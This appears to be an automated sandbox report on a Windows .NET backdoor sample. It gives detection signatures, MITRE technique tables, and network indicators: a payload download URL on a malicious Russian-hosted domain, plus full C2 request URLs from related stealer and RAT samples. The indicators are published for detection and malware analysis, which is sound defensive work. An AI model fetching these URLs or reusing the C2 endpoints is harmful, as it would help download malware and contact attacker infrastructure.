Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01US71QGnu.exe

Overview

General Information

Sample name:01US71QGnu.exe
renamed because original name is a hash value
Original sample name:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726.exe
Analysis ID:1504063
MD5:4505703b220fa0679096c65fefb6d832
SHA1:9584421b46e5641072a95f95c505d4dd7a414a44
SHA256:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info

Classification

  • System is w10x64
  • 01US71QGnu.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\01US71QGnu.exe" MD5: 4505703B220FA0679096C65FEFB6D832)
    • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://a1023269.xsph.ruAvira URL Cloud: Label: malware
Source: http://a1023269.xsph.ru/yhjjk.exeTAvira URL Cloud: Label: malware
Source: http://a1023269.xsph.ru/yhjjk.exeAvira URL Cloud: Label: malware
Source: 01US71QGnu.exeReversingLabs: Detection: 54%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.2% probability
Source: 01US71QGnu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\ADMIN\source\repos\ConsoleApp1\ConsoleApp1\obj\Release\wqb.pdb source: 01US71QGnu.exe
Source: global trafficHTTP traffic detected: GET /yhjjk.exe HTTP/1.1Host: a1023269.xsph.ruConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /yhjjk.exe HTTP/1.1Host: a1023269.xsph.ruConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: a1023269.xsph.ru
Source: 01US71QGnu.exe, 00000000.00000002.3016312410.0000000002788000.00000004.00000800.00020000.00000000.sdmp, 01US71QGnu.exe, 00000000.00000002.3016312410.0000000002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.ru
Source: 01US71QGnu.exeString found in binary or memory: http://a1023269.xsph.ru/yhjjk.exe
Source: 01US71QGnu.exe, 00000000.00000002.3016312410.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.ru/yhjjk.exeT
Source: 01US71QGnu.exe, 00000000.00000002.3016312410.0000000002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023269.xsph.rud
Source: 01US71QGnu.exe, 00000000.00000002.3016312410.000000000277C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8
Source: 01US71QGnu.exe, 00000000.00000002.3015802260.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 01US71QGnu.exe
Source: 01US71QGnu.exe, 00000000.00000000.2013643259.00000000002C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewqb.exe8 vs 01US71QGnu.exe
Source: 01US71QGnu.exeBinary or memory string: OriginalFilenamewqb.exe8 vs 01US71QGnu.exe
Source: 01US71QGnu.exe, a1b2c3.csSuspicious URL: 'http://a1023269.xsph.ru/yhjjk.exe'
Source: classification engineClassification label: mal60.winEXE@2/2@1/1
Source: C:\Users\user\Desktop\01US71QGnu.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\01US71QGnu.exe.logJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: 01US71QGnu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 01US71QGnu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\01US71QGnu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 01US71QGnu.exeReversingLabs: Detection: 54%
Source: unknownProcess created: C:\Users\user\Desktop\01US71QGnu.exe "C:\Users\user\Desktop\01US71QGnu.exe"
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeSection loaded: fwpuclnt.dllJump to behavior
Source: 01US71QGnu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 01US71QGnu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 01US71QGnu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\ADMIN\source\repos\ConsoleApp1\ConsoleApp1\obj\Release\wqb.pdb source: 01US71QGnu.exe
Source: 01US71QGnu.exeStatic PE information: 0xBEF1DB58 [Tue Jul 7 19:02:48 2071 UTC]
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 5688Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 5688Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 1532Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exe TID: 892Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: 01US71QGnu.exe, 00000000.00000002.3015802260.0000000000832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\01US71QGnu.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeQueries volume information: C:\Users\user\Desktop\01US71QGnu.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\01US71QGnu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager12
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
01US71QGnu.exe54%ReversingLabsWin32.Backdoor.Redcap
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name80%Avira URL Cloudsafe
http://a1023269.xsph.ru100%Avira URL Cloudmalware
http://a1023269.xsph.ru/yhjjk.exeT100%Avira URL Cloudmalware
http://a1023269.xsph.ru/yhjjk.exe100%Avira URL Cloudmalware
http://a1023269.xsph.rud0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a1023269.xsph.ru
141.8.197.42
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://a1023269.xsph.ru/yhjjk.exefalse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://a1023269.xsph.ru01US71QGnu.exe, 00000000.00000002.3016312410.0000000002788000.00000004.00000800.00020000.00000000.sdmp, 01US71QGnu.exe, 00000000.00000002.3016312410.0000000002794000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    http://a1023269.xsph.ru/yhjjk.exeT01US71QGnu.exe, 00000000.00000002.3016312410.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name801US71QGnu.exe, 00000000.00000002.3016312410.000000000277C000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://a1023269.xsph.rud01US71QGnu.exe, 00000000.00000002.3016312410.0000000002794000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    141.8.197.42
    a1023269.xsph.ruRussian Federation
    35278SPRINTHOSTRUfalse
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1504063
    Start date and time:2024-09-04 14:10:13 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 2s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Run with higher sleep bypass
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:01US71QGnu.exe
    renamed because original name is a hash value
    Original Sample Name:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726.exe
    Detection:MAL
    Classification:mal60.winEXE@2/2@1/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 21
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target 01US71QGnu.exe, PID 2944 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • VT rate limit hit for: 01US71QGnu.exe
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    141.8.197.42LisectAVT_2403002A_442.exeGet hashmaliciousDCRatBrowse
    • a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN
    PMDfwr7Jal.exeGet hashmaliciousDCRatBrowse
    • a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp
    quotation.docGet hashmaliciousUnknownBrowse
    • a0862680.xsph.ru/djlipantro2.1.exe
    HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exeGet hashmaliciousBlackNETBrowse
    • f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
    442.111).lnkGet hashmaliciousUnknownBrowse
    • a0705880.xsph.ru/selection/seedling.txt
    htmlayout.dllGet hashmaliciousUnknownBrowse
    • a0747694.xsph.ru/serv.php
    qRsw2oZH24.exeGet hashmaliciousPanda StealerBrowse
    • crimestreetsru.ru.xsph.ru/collect.php
    svchost.exeGet hashmaliciousPanda StealerBrowse
    • asdqwezxc.ru.xsph.ru/collect.php
    btwGaban.exeGet hashmaliciousCollectorGoomba, Panda StealerBrowse
    • a0680922.xsph.ru/collect.php
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SPRINTHOSTRUTP7s9GhJLn.exeGet hashmaliciousDCRatBrowse
    • 141.8.197.42
    N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
    • 141.8.197.42
    SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
    • 185.251.91.119
    40830001.xlsGet hashmaliciousSmokeLoaderBrowse
    • 185.251.91.119
    2ZJuaB7CQ4.exeGet hashmaliciousDCRatBrowse
    • 141.8.194.149
    5P9EdUgv5r.exeGet hashmaliciousDCRatBrowse
    • 141.8.194.149
    06wRHV3NYY.exeGet hashmaliciousDCRatBrowse
    • 141.8.192.103
    bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
    • 141.8.197.42
    YMtjYvZX2i.exeGet hashmaliciousDCRatBrowse
    • 141.8.197.42
    No context
    No context
    Process:C:\Users\user\Desktop\01US71QGnu.exe
    File Type:CSV text
    Category:modified
    Size (bytes):1058
    Entropy (8bit):5.356262093008712
    Encrypted:false
    SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
    MD5:B2EFBF032531DD2913F648E75696B0FD
    SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
    SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
    SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
    Malicious:true
    Reputation:moderate, very likely benign file
    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
    Process:C:\Users\user\Desktop\01US71QGnu.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):35
    Entropy (8bit):1.6763889527583498
    Encrypted:false
    SSDEEP:3:RRRntLQ:LFtLQ
    MD5:2E0078F8FCCA6F98D2E7F01CAD6B9A3F
    SHA1:F347AAA233CDD587CAF8A508C6AB5C33B6C6ADAE
    SHA-256:96B0954F573C5D8AFA2A02753A2EBBACB9B3D680D5C138889FD0D3A418590A14
    SHA-512:76BEC5B715AC5E1169710AD29BBC8E09A00E02307ADDF980011FECD62DCEFFD8DE43FBFCCF3BC36A09D6FD74A5DC3CDF68E4DB535A8FCDD0459425BC35B2300D
    Malicious:false
    Reputation:low
    Preview:????????? ??????: URL ??????????...
    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
    Entropy (8bit):5.15779834813011
    TrID:
    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    • Win32 Executable (generic) a (10002005/4) 49.78%
    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
    • Generic Win/DOS Executable (2004/3) 0.01%
    • DOS Executable Generic (2002/1) 0.01%
    File name:01US71QGnu.exe
    File size:9'728 bytes
    MD5:4505703b220fa0679096c65fefb6d832
    SHA1:9584421b46e5641072a95f95c505d4dd7a414a44
    SHA256:80baf79ba445e39b66046225825ed38d4a3a8a34b2fd63ed14a907f41ffb2726
    SHA512:9c5a3d625bec802fdb406026bd492c355d369be3362ed908e52bed66e0be6b01f79ccaa3b74e38dcf8116ea19aa28fdcd9abb4d1ca8ec116057d55bf5504a4a2
    SSDEEP:96:HraIiZVZgdEIk6LNzs58kNgqkFA2LkrF0WsRMlcRuBNgkE+rCrMWCxdiITjU9SFz:f/kaORO9LUGtb+WrgRTjVd8EUK
    TLSH:B612E9079FE8D733E92F067C5DB293434372F7029922EBAE7C4E75862D26254025279B
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............."...0..............;... ...@....@.. ....................................`................................
    Icon Hash:00928e8e8686b000
    Entrypoint:0x403bee
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows cui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Time Stamp:0xBEF1DB58 [Tue Jul 7 19:02:48 2071 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
    Instruction
    jmp dword ptr [00402000h]
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
